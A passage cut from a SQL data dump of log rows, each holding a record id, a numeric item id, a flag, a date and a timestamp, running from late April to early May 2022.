22:54:25'),(50302,3752,1,'2022-04-26','2022-04-26 23:33:47'),(50303,3691,1,'2022-04-27','2022-04-27 00:02:23'),(50304,1544,1,'2022-04-27','2022-04-27 00:11:22'),(50305,1544,1,'2022-04-27','2022-04-27 00:15:28'),(50306,1544,1,'2022-04-27','2022-04-27 00:20:40'),(50307,3691,1,'2022-04-27','2022-04-27 00:31:38'),(50308,1582,1,'2022-04-27','2022-04-27 01:00:44'),(50309,1582,1,'2022-04-27','2022-04-27 01:29:20'),(50310,2248,1,'2022-04-27','2022-04-27 01:55:46'),(50311,4524,1,'2022-04-27','2022-04-27 02:40:15'),(50312,2297,1,'2022-04-27','2022-04-27 03:45:36'),(50313,1877,1,'2022-04-27','2022-04-27 03:51:14'),(50314,4582,1,'2022-04-27','2022-04-27 04:07:48'),(50315,3746,1,'2022-04-27','2022-04-27 05:01:58'),(50316,2813,1,'2022-04-27','2022-04-27 05:45:28'),(50317,2617,1,'2022-04-27','2022-04-27 06:11:23'),(50318,3006,1,'2022-04-27','2022-04-27 06:30:19'),(50319,1606,1,'2022-04-27','2022-04-27 06:55:31'),(50320,3253,1,'2022-04-27','2022-04-27 07:15:20'),(50321,2617,1,'2022-04-27','2022-04-27 07:49:42'),(50322,2993,1,'2022-04-27','2022-04-27 08:38:02'),(50323,482,1,'2022-04-27','2022-04-27 08:46:07'),(50324,1602,1,'2022-04-27','2022-04-27 09:04:42'),(50325,4639,1,'2022-04-27','2022-04-27 09:08:30'),(50326,1582,1,'2022-04-27','2022-04-27 09:10:34'),(50327,1728,1,'2022-04-27','2022-04-27 09:29:28'),(50328,2813,1,'2022-04-27','2022-04-27 09:30:19'),(50329,4520,1,'2022-04-27','2022-04-27 10:54:34'),(50330,3752,1,'2022-04-27','2022-04-27 11:10:31'),(50331,4618,1,'2022-04-27','2022-04-27 11:17:48'),(50332,3664,1,'2022-04-27','2022-04-27 11:25:12'),(50333,2154,1,'2022-04-27','2022-04-27 11:41:59'),(50334,2154,1,'2022-04-27','2022-04-27 11:46:35'),(50335,4645,1,'2022-04-27','2022-04-27 11:46:52'),(50336,4648,1,'2022-04-27','2022-04-27 11:47:00'),(50337,4651,1,'2022-04-27','2022-04-27 11:47:20'),(50338,4654,1,'2022-04-27','2022-04-27 11:47:36'),(50339,4657,1,'2022-04-27','2022-04-27 11:48:04'),(50340,4660,1,'2022-04-27','2022-04-27 11:50:21'),(50341,4457,1,'2022-04-27','2022-04-27 12:00:58'),(50342,3691,1,'2022-04-27','2022-04-27 12:02:54'),(50343,4457,1,'2022-04-27','2022-04-27 12:09:28'),(50344,2704,1,'2022-04-27','2022-04-27 12:16:59'),(50345,4382,1,'2022-04-27','2022-04-27 12:18:27'),(50346,1544,1,'2022-04-27','2022-04-27 12:27:42'),(50347,1608,1,'2022-04-27','2022-04-27 12:30:46'),(50348,2904,1,'2022-04-27','2022-04-27 12:35:17'),(50349,4663,1,'2022-04-27','2022-04-27 12:46:49'),(50350,1588,1,'2022-04-27','2022-04-27 12:50:17'),(50351,3030,1,'2022-04-27','2022-04-27 12:56:52'),(50352,4520,1,'2022-04-27','2022-04-27 13:11:05'),(50353,2904,1,'2022-04-27','2022-04-27 13:16:25'),(50354,2904,1,'2022-04-27','2022-04-27 13:19:32'),(50355,2904,1,'2022-04-27','2022-04-27 13:22:07'),(50356,1582,1,'2022-04-27','2022-04-27 13:28:34'),(50357,1612,1,'2022-04-27','2022-04-27 13:39:59'),(50358,4542,1,'2022-04-27','2022-04-27 13:44:18'),(50359,76,1,'2022-04-27','2022-04-27 13:50:06'),(50360,335,1,'2022-04-27','2022-04-27 13:57:01'),(50361,2769,1,'2022-04-27','2022-04-27 13:58:11'),(50362,76,1,'2022-04-27','2022-04-27 13:58:32'),(50363,4660,1,'2022-04-27','2022-04-27 14:04:00'),(50364,3746,1,'2022-04-27','2022-04-27 14:04:31'),(50365,3030,1,'2022-04-27','2022-04-27 14:25:31'),(50366,1766,1,'2022-04-27','2022-04-27 14:37:23'),(50367,3030,1,'2022-04-27','2022-04-27 14:40:48'),(50368,2457,1,'2022-04-27','2022-04-27 15:03:12'),(50369,2457,1,'2022-04-27','2022-04-27 15:03:14'),(50370,2457,1,'2022-04-27','2022-04-27 15:03:19'),(50371,2154,1,'2022-04-27','2022-04-27 15:24:11'),(50372,2154,1,'2022-04-27','2022-04-27 15:25:26'),(50373,80,1,'2022-04-27','2022-04-27 15:33:04'),(50374,2617,1,'2022-04-27','2022-04-27 16:13:12'),(50375,482,1,'2022-04-27','2022-04-27 16:22:34'),(50376,1606,1,'2022-04-27','2022-04-27 16:59:35'),(50377,482,1,'2022-04-27','2022-04-27 17:07:33'),(50378,1612,1,'2022-04-27','2022-04-27 17:20:36'),(50379,4416,1,'2022-04-27','2022-04-27 17:24:42'),(50380,3117,1,'2022-04-27','2022-04-27 17:40:31'),(50381,4618,1,'2022-04-27','2022-04-27 19:10:42'),(50382,1728,1,'2022-04-27','2022-04-27 19:57:50'),(50383,1728,1,'2022-04-27','2022-04-27 19:58:03'),(50384,3752,1,'2022-04-27','2022-04-27 20:40:32'),(50385,4660,1,'2022-04-27','2022-04-27 20:52:10'),(50386,4663,1,'2022-04-27','2022-04-27 20:52:14'),(50387,80,1,'2022-04-27','2022-04-27 20:55:59'),(50388,3030,1,'2022-04-27','2022-04-27 21:25:32'),(50389,80,1,'2022-04-27','2022-04-27 22:09:53'),(50390,4529,1,'2022-04-28','2022-04-28 01:10:51'),(50391,2804,1,'2022-04-28','2022-04-28 01:19:13'),(50392,3479,1,'2022-04-28','2022-04-28 04:43:28'),(50393,1594,1,'2022-04-28','2022-04-28 04:58:09'),(50394,80,1,'2022-04-28','2022-04-28 05:32:49'),(50395,4651,1,'2022-04-28','2022-04-28 06:44:56'),(50396,2309,1,'2022-04-28','2022-04-28 06:57:56'),(50397,2148,1,'2022-04-28','2022-04-28 07:23:21'),(50398,80,1,'2022-04-28','2022-04-28 07:37:21'),(50399,3479,1,'2022-04-28','2022-04-28 07:46:55'),(50400,80,1,'2022-04-28','2022-04-28 08:01:22'),(50401,1598,1,'2022-04-28','2022-04-28 08:12:49'),(50402,2769,1,'2022-04-28','2022-04-28 08:39:12'),(50403,2769,1,'2022-04-28','2022-04-28 08:39:27'),(50404,2309,1,'2022-04-28','2022-04-28 09:00:05'),(50405,1596,1,'2022-04-28','2022-04-28 09:15:48'),(50406,4663,1,'2022-04-28','2022-04-28 09:21:21'),(50407,3079,1,'2022-04-28','2022-04-28 09:22:56'),(50408,4529,1,'2022-04-28','2022-04-28 09:24:30'),(50409,4648,1,'2022-04-28','2022-04-28 09:31:33'),(50410,80,1,'2022-04-28','2022-04-28 10:09:41'),(50411,1722,1,'2022-04-28','2022-04-28 10:10:22'),(50412,1722,1,'2022-04-28','2022-04-28 10:10:31'),(50413,1722,1,'2022-04-28','2022-04-28 10:10:43'),(50414,1722,1,'2022-04-28','2022-04-28 10:13:17'),(50415,1722,1,'2022-04-28','2022-04-28 10:13:51'),(50416,1722,1,'2022-04-28','2022-04-28 10:15:28'),(50417,1722,1,'2022-04-28','2022-04-28 10:28:52'),(50418,1722,1,'2022-04-28','2022-04-28 10:28:58'),(50419,1722,1,'2022-04-28','2022-04-28 10:29:01'),(50420,1602,1,'2022-04-28','2022-04-28 10:33:33'),(50421,3764,1,'2022-04-28','2022-04-28 10:49:56'),(50422,1594,1,'2022-04-28','2022-04-28 11:16:37'),(50423,1586,1,'2022-04-28','2022-04-28 11:20:12'),(50424,1594,1,'2022-04-28','2022-04-28 11:23:54'),(50425,570,1,'2022-04-28','2022-04-28 11:46:08'),(50426,1582,1,'2022-04-28','2022-04-28 12:23:45'),(50427,1582,1,'2022-04-28','2022-04-28 12:30:47'),(50428,2165,1,'2022-04-28','2022-04-28 14:34:58'),(50429,2309,1,'2022-04-28','2022-04-28 15:06:13'),(50430,4657,1,'2022-04-28','2022-04-28 16:36:53'),(50431,1594,1,'2022-04-28','2022-04-28 16:42:17'),(50432,3479,1,'2022-04-28','2022-04-28 17:17:38'),(50433,1610,1,'2022-04-28','2022-04-28 17:48:13'),(50434,1722,1,'2022-04-28','2022-04-28 18:24:11'),(50435,2159,1,'2022-04-28','2022-04-28 18:38:45'),(50436,2309,1,'2022-04-28','2022-04-28 18:47:38'),(50437,1728,1,'2022-04-28','2022-04-28 20:09:31'),(50438,4391,1,'2022-04-28','2022-04-28 20:10:10'),(50439,1728,1,'2022-04-28','2022-04-28 20:10:15'),(50440,1728,1,'2022-04-28','2022-04-28 20:10:40'),(50441,1600,1,'2022-04-28','2022-04-28 21:31:41'),(50442,80,1,'2022-04-28','2022-04-28 21:34:04'),(50443,1596,1,'2022-04-28','2022-04-28 22:00:33'),(50444,1596,1,'2022-04-28','2022-04-28 22:00:56'),(50445,1596,1,'2022-04-28','2022-04-28 22:15:45'),(50446,1598,1,'2022-04-28','2022-04-28 22:16:27'),(50447,1596,1,'2022-04-28','2022-04-28 22:16:40'),(50448,4645,1,'2022-04-28','2022-04-28 22:28:12'),(50449,3691,1,'2022-04-28','2022-04-28 22:55:30'),(50450,4651,1,'2022-04-28','2022-04-28 23:33:43'),(50451,4391,1,'2022-04-28','2022-04-28 23:41:55'),(50452,470,1,'2022-04-28','2022-04-28 23:56:34'),(50453,2609,1,'2022-04-28','2022-04-28 23:59:19'),(50454,3005,1,'2022-04-29','2022-04-29 00:04:46'),(50455,2420,1,'2022-04-29','2022-04-29 00:27:40'),(50456,3030,1,'2022-04-29','2022-04-29 00:33:31'),(50457,2609,1,'2022-04-29','2022-04-29 00:39:09'),(50458,2609,1,'2022-04-29','2022-04-29 00:44:42'),(50459,2148,1,'2022-04-29','2022-04-29 00:50:23'),(50460,2148,1,'2022-04-29','2022-04-29 00:56:06'),(50461,3005,1,'2022-04-29','2022-04-29 01:01:50'),(50462,3030,1,'2022-04-29','2022-04-29 01:08:50'),(50463,4654,1,'2022-04-29','2022-04-29 01:15:58'),(50464,2420,1,'2022-04-29','2022-04-29 01:24:38'),(50465,3752,1,'2022-04-29','2022-04-29 01:30:21'),(50466,1586,1,'2022-04-29','2022-04-29 01:36:32'),(50467,1600,1,'2022-04-29','2022-04-29 01:41:51'),(50468,1610,1,'2022-04-29','2022-04-29 01:53:20'),(50469,1598,1,'2022-04-29','2022-04-29 02:04:56'),(50470,1766,1,'2022-04-29','2022-04-29 02:10:30'),(50471,1741,1,'2022-04-29','2022-04-29 02:39:37'),(50472,2309,1,'2022-04-29','2022-04-29 02:51:12'),(50473,76,1,'2022-04-29','2022-04-29 03:48:52'),(50474,1598,1,'2022-04-29','2022-04-29 03:49:05'),(50475,4391,1,'2022-04-29','2022-04-29 05:19:03'),(50476,1596,1,'2022-04-29','2022-04-29 05:33:28'),(50477,1872,1,'2022-04-29','2022-04-29 06:12:21'),(50478,1592,1,'2022-04-29','2022-04-29 06:40:45'),(50479,1586,1,'2022-04-29','2022-04-29 06:51:29'),(50480,1586,1,'2022-04-29','2022-04-29 06:52:42'),(50481,1588,1,'2022-04-29','2022-04-29 07:19:10'),(50482,1602,1,'2022-04-29','2022-04-29 08:49:31'),(50483,1544,1,'2022-04-29','2022-04-29 09:34:29'),(50484,3752,1,'2022-04-29','2022-04-29 09:49:05'),(50485,3664,1,'2022-04-29','2022-04-29 10:37:40'),(50486,3691,1,'2022-04-29','2022-04-29 10:49:40'),(50487,3664,1,'2022-04-29','2022-04-29 11:23:02'),(50488,1602,1,'2022-04-29','2022-04-29 11:34:04'),(50489,2420,1,'2022-04-29','2022-04-29 12:02:37'),(50490,467,1,'2022-04-29','2022-04-29 12:02:44'),(50491,1592,1,'2022-04-29','2022-04-29 12:04:50'),(50492,1726,1,'2022-04-29','2022-04-29 12:07:39'),(50493,1588,1,'2022-04-29','2022-04-29 12:09:03'),(50494,2297,1,'2022-04-29','2022-04-29 12:12:06'),(50495,1598,1,'2022-04-29','2022-04-29 12:19:03'),(50496,1728,1,'2022-04-29','2022-04-29 12:21:32'),(50497,1728,1,'2022-04-29','2022-04-29 12:21:57'),(50498,467,1,'2022-04-29','2022-04-29 12:29:06'),(50499,1600,1,'2022-04-29','2022-04-29 12:39:57'),(50500,68,1,'2022-04-29','2022-04-29 12:42:41'),(50501,91,1,'2022-04-29','2022-04-29 12:42:52'),(50502,3259,1,'2022-04-29','2022-04-29 12:48:03'),(50503,3259,1,'2022-04-29','2022-04-29 12:48:32'),(50504,87,1,'2022-04-29','2022-04-29 12:49:09'),(50505,488,1,'2022-04-29','2022-04-29 12:49:26'),(50506,87,1,'2022-04-29','2022-04-29 12:50:36'),(50507,488,1,'2022-04-29','2022-04-29 12:51:26'),(50508,87,1,'2022-04-29','2022-04-29 12:51:44'),(50509,3259,1,'2022-04-29','2022-04-29 12:51:51'),(50510,3259,1,'2022-04-29','2022-04-29 12:52:07'),(50511,3259,1,'2022-04-29','2022-04-29 12:52:26'),(50512,3259,1,'2022-04-29','2022-04-29 12:52:43'),(50513,3259,1,'2022-04-29','2022-04-29 13:02:34'),(50514,3746,1,'2022-04-29','2022-04-29 13:19:08'),(50515,1741,1,'2022-04-29','2022-04-29 13:29:04'),(50516,68,1,'2022-04-29','2022-04-29 13:36:23'),(50517,2993,1,'2022-04-29','2022-04-29 13:38:03'),(50518,3752,1,'2022-04-29','2022-04-29 13:39:04'),(50519,91,1,'2022-04-29','2022-04-29 13:43:15'),(50520,479,1,'2022-04-29','2022-04-29 13:49:06'),(50521,3069,1,'2022-04-29','2022-04-29 13:59:03'),(50522,76,1,'2022-04-29','2022-04-29 14:04:40'),(50523,91,1,'2022-04-29','2022-04-29 14:06:39'),(50524,4654,1,'2022-04-29','2022-04-29 14:09:05'),(50525,4432,1,'2022-04-29','2022-04-29 14:09:28'),(50526,2993,1,'2022-04-29','2022-04-29 14:22:42'),(50527,4612,1,'2022-04-29','2022-04-29 14:38:40'),(50528,1606,1,'2022-04-29','2022-04-29 14:39:03'),(50529,3069,1,'2022-04-29','2022-04-29 14:50:01'),(50530,1586,1,'2022-04-29','2022-04-29 15:02:19'),(50531,2420,1,'2022-04-29','2022-04-29 15:05:03'),(50532,1596,1,'2022-04-29','2022-04-29 15:17:16'),(50533,1596,1,'2022-04-29','2022-04-29 15:20:04'),(50534,1596,1,'2022-04-29','2022-04-29 15:21:27'),(50535,3752,1,'2022-04-29','2022-04-29 17:59:02'),(50536,482,1,'2022-04-29','2022-04-29 18:59:58'),(50537,1602,1,'2022-04-29','2022-04-29 19:30:13'),(50538,4660,1,'2022-04-29','2022-04-29 19:48:30'),(50539,482,1,'2022-04-29','2022-04-29 20:29:21'),(50540,2309,1,'2022-04-29','2022-04-29 20:59:03'),(50541,1604,1,'2022-04-29','2022-04-29 22:29:04'),(50542,1588,1,'2022-04-29','2022-04-29 23:49:12'),(50543,2309,1,'2022-04-30','2022-04-30 00:52:28'),(50544,1606,1,'2022-04-30','2022-04-30 00:59:05'),(50545,2956,1,'2022-04-30','2022-04-30 02:29:04'),(50546,1602,1,'2022-04-30','2022-04-30 03:17:57'),(50547,3313,1,'2022-04-30','2022-04-30 04:55:48'),(50548,1709,1,'2022-04-30','2022-04-30 05:20:27'),(50549,4660,1,'2022-04-30','2022-04-30 06:13:56'),(50550,1598,1,'2022-04-30','2022-04-30 07:08:21'),(50551,1598,1,'2022-04-30','2022-04-30 07:08:36'),(50552,1614,1,'2022-04-30','2022-04-30 07:59:30'),(50553,2911,1,'2022-04-30','2022-04-30 12:19:45'),(50554,3087,1,'2022-04-30','2022-04-30 12:42:25'),(50555,3069,1,'2022-04-30','2022-04-30 12:48:26'),(50556,2309,1,'2022-04-30','2022-04-30 15:03:30'),(50557,1594,1,'2022-04-30','2022-04-30 15:10:33'),(50558,1718,1,'2022-04-30','2022-04-30 16:51:16'),(50559,477,1,'2022-04-30','2022-04-30 17:18:31'),(50560,1718,1,'2022-04-30','2022-04-30 17:31:52'),(50561,3096,1,'2022-04-30','2022-04-30 17:45:52'),(50562,1600,1,'2022-04-30','2022-04-30 18:12:02'),(50563,4654,1,'2022-04-30','2022-04-30 18:26:55'),(50564,4657,1,'2022-04-30','2022-04-30 18:38:57'),(50565,3706,1,'2022-04-30','2022-04-30 18:44:37'),(50566,4457,1,'2022-04-30','2022-04-30 18:50:45'),(50567,3746,1,'2022-04-30','2022-04-30 18:52:53'),(50568,1604,1,'2022-04-30','2022-04-30 19:05:55'),(50569,4657,1,'2022-04-30','2022-04-30 19:19:55'),(50570,1600,1,'2022-04-30','2022-04-30 19:32:50'),(50571,479,1,'2022-04-30','2022-04-30 19:46:18'),(50572,1600,1,'2022-04-30','2022-04-30 19:59:47'),(50573,3034,1,'2022-04-30','2022-04-30 20:46:19'),(50574,4524,1,'2022-04-30','2022-04-30 20:49:02'),(50575,4524,1,'2022-04-30','2022-04-30 20:55:50'),(50576,1877,1,'2022-04-30','2022-04-30 21:30:12'),(50577,1872,1,'2022-04-30','2022-04-30 22:18:31'),(50578,1588,1,'2022-04-30','2022-04-30 22:52:06'),(50579,3087,1,'2022-04-30','2022-04-30 22:56:56'),(50580,108,1,'2022-04-30','2022-04-30 22:57:04'),(50581,3030,1,'2022-04-30','2022-04-30 23:27:12'),(50582,1608,1,'2022-04-30','2022-04-30 23:28:43'),(50583,1596,1,'2022-04-30','2022-04-30 23:44:22'),(50584,3790,1,'2022-05-01','2022-05-01 00:00:10'),(50585,1584,1,'2022-05-01','2022-05-01 00:04:32'),(50586,1602,1,'2022-05-01','2022-05-01 01:44:00'),(50587,2617,1,'2022-05-01','2022-05-01 01:57:56'),(50588,1606,1,'2022-05-01','2022-05-01 02:47:29'),(50589,1590,1,'2022-05-01','2022-05-01 04:10:58'),(50590,2457,1,'2022-05-01','2022-05-01 04:11:47'),(50591,3045,1,'2022-05-01','2022-05-01 04:39:29'),(50592,3030,1,'2022-05-01','2022-05-01 04:50:08'),(50593,4457,1,'2022-05-01','2022-05-01 04:56:49'),(50594,80,1,'2022-05-01','2022-05-01 05:59:07'),(50595,2991,1,'2022-05-01','2022-05-01 06:54:18'),(50596,4542,1,'2022-05-01','2022-05-01 07:18:43'),(50597,3097,1,'2022-05-01','2022-05-01 07:25:46'),(50598,1600,1,'2022-05-01','2022-05-01 07:32:48'),(50599,3034,1,'2022-05-01','2022-05-01 07:39:49'),(50600,4657,1,'2022-05-01','2022-05-01 07:54:38'),(50601,479,1,'2022-05-01','2022-05-01 08:01:38'),(50602,4542,1,'2022-05-01','2022-05-01 08:08:00'),(50603,1598,1,'2022-05-01','2022-05-01 08:15:10'),(50604,3746,1,'2022-05-01','2022-05-01 08:22:07'),(50605,3752,1,'2022-05-01','2022-05-01 08:36:11'),(50606,4524,1,'2022-05-01','2022-05-01 08:43:29'),(50607,4420,1,'2022-05-01','2022-05-01 08:50:15'),(50608,1872,1,'2022-05-01','2022-05-01 08:58:06'),(50609,1877,1,'2022-05-01','2022-05-01 09:04:21'),(50610,1594,1,'2022-05-01','2022-05-01 09:25:36'),(50611,4582,1,'2022-05-01','2022-05-01 09:39:36'),(50612,4612,1,'2022-05-01','2022-05-01 09:46:43'),(50613,3034,1,'2022-05-01','2022-05-01 10:48:58'),(50614,2309,1,'2022-05-01','2022-05-01 11:19:23'),(50615,1544,1,'2022-05-01','2022-05-01 11:31:56'),(50616,1596,1,'2022-05-01','2022-05-01 11:58:27'),(50617,1586,1,'2022-05-01','2022-05-01 12:03:42'),(50618,0,1,'2022-05-01','2022-05-01 12:31:03'),(50619,2904,1,'2022-05-01','2022-05-01 13:01:09'),(50620,2558,1,'2022-05-01','2022-05-01 13:10:59'),(50621,468,1,'2022-05-01','2022-05-01 13:28:27'),(50622,3313,1,'2022-05-01','2022-05-01 14:08:27'),(50623,1726,1,'2022-05-01','2022-05-01 14:28:36'),(50624,2993,1,'2022-05-01','2022-05-01 15:11:12'),(50625,3030,1,'2022-05-01','2022-05-01 15:17:04'),(50626,3307,1,'2022-05-01','2022-05-01 15:38:43'),(50627,3664,1,'2022-05-01','2022-05-01 15:56:09'),(50628,2159,1,'2022-05-01','2022-05-01 16:10:40'),(50629,2159,1,'2022-05-01','2022-05-01 16:10:52'),(50630,2159,1,'2022-05-01','2022-05-01 16:11:01'),(50631,1594,1,'2022-05-01','2022-05-01 16:13:27'),(50632,1598,1,'2022-05-01','2022-05-01 16:26:59'),(50633,2993,1,'2022-05-01','2022-05-01 16:41:09'),(50634,3752,1,'2022-05-01','2022-05-01 16:48:10'),(50635,3313,1,'2022-05-01','2022-05-01 17:00:04'),(50636,3307,1,'2022-05-01','2022-05-01 17:11:25'),(50637,2558,1,'2022-05-01','2022-05-01 17:23:18'),(50638,4654,1,'2022-05-01','2022-05-01 17:34:27'),(50639,3030,1,'2022-05-01','2022-05-01 17:46:59'),(50640,3030,1,'2022-05-01','2022-05-01 17:57:54'),(50641,1600,1,'2022-05-01','2022-05-01 18:09:08'),(50642,1877,1,'2022-05-01','2022-05-01 18:26:47'),(50643,1741,1,'2022-05-01','2022-05-01 18:44:42'),(50644,3781,1,'2022-05-01','2022-05-01 18:56:55'),(50645,1614,1,'2022-05-01','2022-05-01 19:10:05'),(50646,1614,1,'2022-05-01','2022-05-01 19:14:04'),(50647,3746,1,'2022-05-01','2022-05-01 19:37:17'),(50648,4582,1,'2022-05-01','2022-05-01 20:32:01'),(50649,4654,1,'2022-05-01','2022-05-01 23:47:52'),(50650,1766,1,'2022-05-02','2022-05-02 00:10:33'),(50651,1766,1,'2022-05-02','2022-05-02 00:10:58'),(50652,1766,1,'2022-05-02','2022-05-02 00:12:27'),(50653,3313,1,'2022-05-02','2022-05-02 00:32:54'),(50654,3251,1,'2022-05-02','2022-05-02 02:03:58'),(50655,2971,1,'2022-05-02','2022-05-02 02:43:47'),(50656,2503,1,'2022-05-02','2022-05-02 02:59:48'),(50657,76,1,'2022-05-02','2022-05-02 03:00:00'),(50658,3083,1,'2022-05-02','2022-05-02 03:00:41'),(50659,1544,1,'2022-05-02','2022-05-02 03:06:21'),(50660,3752,1,'2022-05-02','2022-05-02 03:12:26'),(50661,1606,1,'2022-05-02','2022-05-02 03:21:43'),(50662,1872,1,'2022-05-02','2022-05-02 03:32:52'),(50663,1741,1,'2022-05-02','2022-05-02 03:44:02'),(50664,3746,1,'2022-05-02','2022-05-02 04:17:47'),(50665,1600,1,'2022-05-02','2022-05-02 04:29:11'),(50666,3083,1,'2022-05-02','2022-05-02 04:57:02'),(50667,1544,1,'2022-05-02','2022-05-02 05:10:36'),(50668,1598,1,'2022-05-02','2022-05-02 05:55:18'),(50669,1600,1,'2022-05-02','2022-05-02 06:25:17'),(50670,1588,1,'2022-05-02','2022-05-02 06:40:12'),(50671,4524,1,'2022-05-02','2022-05-02 06:40:15'),(50672,3307,1,'2022-05-02','2022-05-02 07:23:12'),(50673,1594,1,'2022-05-02','2022-05-02 08:48:12'),(50674,1598,1,'2022-05-02','2022-05-02 09:53:19'),(50675,80,1,'2022-05-02','2022-05-02 10:08:06'),(50676,3083,1,'2022-05-02','2022-05-02 11:44:20'),(50677,1600,1,'2022-05-02','2022-05-02 12:25:03'),(50678,2801,1,'2022-05-02','2022-05-02 12:42:55'),(50679,1602,1,'2022-05-02','2022-05-02 12:46:18'),(50680,3706,1,'2022-05-02','2022-05-02 13:13:50'),(50681,3752,1,'2022-05-02','2022-05-02 13:18:46'),(50682,1598,1,'2022-05-02','2022-05-02 13:55:16'),(50683,1612,1,'2022-05-02','2022-05-02 13:55:57'),(50684,2751,1,'2022-05-02','2022-05-02 14:30:01'),(50685,2751,1,'2022-05-02','2022-05-02 14:30:14'),(50686,1600,1,'2022-05-02','2022-05-02 14:30:47'),(50687,2751,1,'2022-05-02','2022-05-02 14:31:07'),(50688,1872,1,'2022-05-02','2022-05-02 15:23:42'),(50689,1602,1,'2022-05-02','2022-05-02 15:53:00'),(50690,1612,1,'2022-05-02','2022-05-02 16:43:31'),(50691,1612,1,'2022-05-02','2022-05-02 17:06:39'),(50692,4657,1,'2022-05-02','2022-05-02 17:20:04'),(50693,1606,1,'2022-05-02','2022-05-02 17:49:31'),(50694,4457,1,'2022-05-02','2022-05-02 17:54:50'),(50695,3083,1,'2022-05-02','2022-05-02 19:48:46'),(50696,1715,1,'2022-05-02','2022-05-02 19:51:17'),(50697,1588,1,'2022-05-02','2022-05-02 19:59:49'),(50698,4485,1,'2022-05-02','2022-05-02 21:03:13'),(50699,1586,1,'2022-05-02','2022-05-02 21:18:46'),(50700,3706,1,'2022-05-02','2022-05-02 21:49:32'),(50701,2609,1,'2022-05-02','2022-05-02 22:47:55'),(50702,2609,1,'2022-05-02','2022-05-02 22:48:22'),(50703,74,1,'2022-05-02','2022-05-02 23:41:09'),(50704,3307,1,'2022-05-03','2022-05-03 00:18:48'),(50705,2809,1,'2022-05-03','2022-05-03 01:03:56'),(50706,80,1,'2022-05-03','2022-05-03 01:34:59'),(50707,68,1,'2022-05-03','2022-05-03 01:35:04'),(50708,108,1,'2022-05-03','2022-05-03 01:35:08'),(50709,3752,1,'2022-05-03','2022-05-03 02:33:51'),(50710,570,1,'2022-05-03','2022-05-03 03:10:28'),(50711,4420,1,'2022-05-03','2022-05-03 06:56:52'),(50712,3781,1,'2022-05-03','2022-05-03 07:28:22'),(50713,3083,1,'2022-05-03','2022-05-03 07:39:06'),(50714,1586,1,'2022-05-03','2022-05-03 08:02:15'),(50715,1602,1,'2022-05-03','2022-05-03 08:24:14'),(50716,3307,1,'2022-05-03','2022-05-03 08:46:48'),(50717,1614,1,'2022-05-03','2022-05-03 09:03:44'),(50718,4238,1,'2022-05-03','2022-05-03 09:55:24'),(50719,2457,1,'2022-05-03','2022-05-03 10:03:54'),(50720,1586,1,'2022-05-03','2022-05-03 10:23:16'),(50721,1586,1,'2022-05-03','2022-05-03 10:23:19'),(50722,1604,1,'2022-05-03','2022-05-03 10:23:35'),(50723,3438,1,'2022-05-03','2022-05-03 10:33:46'),(50724,1598,1,'2022-05-03','2022-05-03 10:52:45'),(50725,4238,1,'2022-05-03','2022-05-03 11:03:46'),(50726,2658,1,'2022-05-03','2022-05-03 13:43:11'),(50727,4412,1,'2022-05-03','2022-05-03 14:02:11'),(50728,3752,1,'2022-05-03','2022-05-03 14:26:14'),(50729,1594,1,'2022-05-03','2022-05-03 15:10:34'),(50730,72,1,'2022-05-03','2022-05-03 15:41:36'),(50731,1586,1,'2022-05-03','2022-05-03 15:52:21'),(50732,1544,1,'2022-05-03','2022-05-03 15:57:01'),(50733,1602,1,'2022-05-03','2022-05-03 17:18:32'),(50734,2309,1,'2022-05-03','2022-05-03 17:43:08'),(50735,2309,1,'2022-05-03','2022-05-03 17:43:33'),(50736,2309,1,'2022-05-03','2022-05-03 17:43:46'),(50737,1614,1,'2022-05-03','2022-05-03 18:31:12'),(50738,4238,1,'2022-05-03','2022-05-03 19:58:13'),(50739,4657,1,'2022-05-03','2022-05-03 21:53:36'),(50740,1610,1,'2022-05-03','2022-05-03 22:16:08'),(50741,1728,1,'2022-05-03','2022-05-03 22:22:21'),(50742,4654,1,'2022-05-03','2022-05-03 22:50:20'),(50743,3752,1,'2022-05-03','2022-05-03 23:18:47'),(50744,4457,1,'2022-05-03','2022-05-03 23:22:16'),(50745,3498,1,'2022-05-04','2022-05-04 00:19:24'),(50746,2956,1,'2022-05-04','2022-05-04 00:19:27'),(50747,3742,1,'2022-05-04','2022-05-04 00:19:28'),(50748,3482,1,'2022-05-04','2022-05-04 00:19:28'),(50749,3430,1,'2022-05-04','2022-05-04 00:19:28'),(50750,3438,1,'2022-05-04','2022-05-04 00:19:29'),(50751,80,1,'2022-05-04','2022-05-04 00:51:55'),(50752,2809,1,'2022-05-04','2022-05-04 01:13:26'),(50753,1596,1,'2022-05-04','2022-05-04 01:46:36'),(50754,2658,1,'2022-05-04','2022-05-04 04:25:54'),(50755,1600,1,'2022-05-04','2022-05-04 04:41:02'),(50756,1592,1,'2022-05-04','2022-05-04 05:28:11'),(50757,4648,1,'2022-05-04','2022-05-04 06:10:52'),(50758,1872,1,'2022-05-04','2022-05-04 06:11:59'),(50759,1743,1,'2022-05-04','2022-05-04 06:23:12'),(50760,1877,1,'2022-05-04','2022-05-04 06:33:50'),(50761,4520,1,'2022-05-04','2022-05-04 07:40:52'),(50762,4457,1,'2022-05-04','2022-05-04 07:44:02'),(50763,3004,1,'2022-05-04','2022-05-04 09:41:23'),(50764,2809,1,'2022-05-04','2022-05-04 10:19:54'),(50765,3771,1,'2022-05-04','2022-05-04 10:20:03'),(50766,3531,1,'2022-05-04','2022-05-04 10:20:09'),(50767,3290,1,'2022-05-04','2022-05-04 10:20:14'),(50768,4663,1,'2022-05-04','2022-05-04 10:20:18'),(50769,3430,1,'2022-05-04','2022-05-04 10:20:23'),(50770,4645,1,'2022-05-04','2022-05-04 10:20:27'),(50771,3127,1,'2022-05-04','2022-05-04 10:20:32'),(50772,3486,1,'2022-05-04','2022-05-04 10:20:37'),(50773,4341,1,'2022-05-04','2022-05-04 10:20:42'),(50774,3710,1,'2022-05-04','2022-05-04 10:20:48'),(50775,3731,1,'2022-05-04','2022-05-04 10:20:52'),(50776,3023,1,'2022-05-04','2022-05-04 10:20:58'),(50777,3030,1,'2022-05-04','2022-05-04 10:21:02'),(50778,4517,1,'2022-05-04','2022-05-04 10:21:07'),(50779,3072,1,'2022-05-04','2022-05-04 10:21:14'),(50780,2801,1,'2022-05-04','2022-05-04 10:21:19'),(50781,3027,1,'2022-05-04','2022-05-04 10:21:23'),(50782,3774,1,'2022-05-04','2022-05-04 10:21:28'),(50783,4326,1,'2022-05-04','2022-05-04 10:21:33'),(50784,4323,1,'2022-05-04','2022-05-04 10:21:38'),(50785,3721,1,'2022-05-04','2022-05-04 10:21:42'),(50786,3738,1,'2022-05-04','2022-05-04 